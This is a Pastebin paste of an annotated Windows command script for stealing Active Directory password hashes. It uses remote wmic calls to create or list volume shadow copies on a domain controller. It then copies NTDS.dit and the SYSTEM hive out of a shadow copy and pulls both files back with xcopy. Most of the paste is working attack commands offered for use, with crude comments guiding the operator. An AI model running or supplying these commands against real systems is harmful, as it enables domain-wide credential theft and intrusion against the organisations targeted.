API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 25th, 2014
241
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.58 KB | None | 0 0
raw download clone embed print report
  1. # mostly entirely stolen from http://www.room362.com/blog/2013/06/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/
  2. # IIGHT UP IN THIS SHIT
  3. # WE GONNA YANK OUT SOME MUTHAFUNKIN HASHES N SHIT (liek all of AD amirite)
  4. # REPLACE ALL DIS SHIT WIT YO SHIT
  5.  
  6. # TARGETDC
  7. # DOMAIN
  8. # USER
  9. # PASSWORD
  10.  
  11. # FIND AND REPLACE ALL BITCH
  12.  
  13. net use \\TARGETDC /user:DOMAIN\USER PASSWORD
  14.  
  15. wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin list shadows 2>&1 > C:\reboot.s246672.log"
  16.  
  17. type \\TARGETDC\C$\reboot.s246672.log
  18.  
  19. # LOOK AT THAT OUTPUT
  20. # IF THERE ARE SHADOW COPIES
  21. # LOOK FOR THE ONE FOR DRIVE C
  22. # YOU WILL SEE SOME SHIT LIKE "HarddiskVolumeShadowCopy10"
  23. # THE NUMBER AT THE END WILL BE DIFFERENT
  24. # REMEMBER THAT FUCKING NUMBER
  25. # FUCK
  26.  
  27. # IF THERE ARE NO SHADOW COPIES
  28. # keep fuckin' truckin'
  29.  
  30. # IF SHADOW COPIES EXIST GOTO FUCKING_SHIT_NIKKCKELS
  31. # MAKE SOME FUCKING SHADOWS
  32. # ONLY PROPER SERVERS CAN RUN VSSADMIN CREATE SHADOW
  33. wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\shutdown.s57345.log"
  34. type \\TARGETDC\C$\shutdown.s57345.log
  35.  
  36. wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c vssadmin list shadows 2>&1 > C:\reboot.s246672.log"
  37. type \\TARGETDC\C$\reboot.s246672.log
  38.  
  39. # LOOK FOR THE ONE FOR DRIVE C
  40. # YOU WILL SEE SOME SHIT LIKE "HarddiskVolumeShadowCopy10" SOMEWHERE
  41. # THE NUMBER AT THE END WILL BE DIFFERENT
  42. # REMEMBER THAT FUCKING NUMBER
  43. # FUCK
  44.  
  45. # FUCKING_SHIT_NIKKCKELS
  46. # DONT JUST FUCKING RUN THIS COMMAND YOU EAGER FUCK
  47. # REMEBER THAT FUCKING NUMER?
  48. # NOW YOU FUCKING NEED IT
  49. # CHANGE HarddiskVolumeShadowCopy10 TO WHATEVER THE FUCK IT WAS
  50. wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SYSTEM C:\SYSTEM.hive 2>&1 > C:\update.36234211.log"
  51.  
  52. # PAY THE FUCK ATTENTION AND CHANGE "HarddiskVolumeShadowCopy10" FOR THIS COMMAND TOO
  53. # FUCK
  54. wmic /node:"TARGETDC" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\NTDS\NTDS.dit C:\NTDS.dit 2>&1 > C:\update.4352.log"
  55.  
  56. # NOW STEAL DAT SHIT MOFUCKA
  57. xcopy \\TARGETDC\C$\SYSTEM.hive .\
  58. xcopy \\TARGETDC\C$\NTDS.dit .\
  59.  
  60. # NOW CLEAN UP YOUR GODDAMN MESS YOU FILTHY MOFUCKA
  61. # OR NOT
  62. # FUCK YOU
  63. # DELETE YOUR SHADOW COPY IF YOU WANT
  64. # FUCKING FREE BACKUPS BITCH
  65. # I DONT GIVE A FUCK
  66.  
  67. del \\TARGETDC\C$\SYSTEM.hive
  68. del \\TARGETDC\C$\NTDS.dit
  69.  
  70. # ENJOI
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!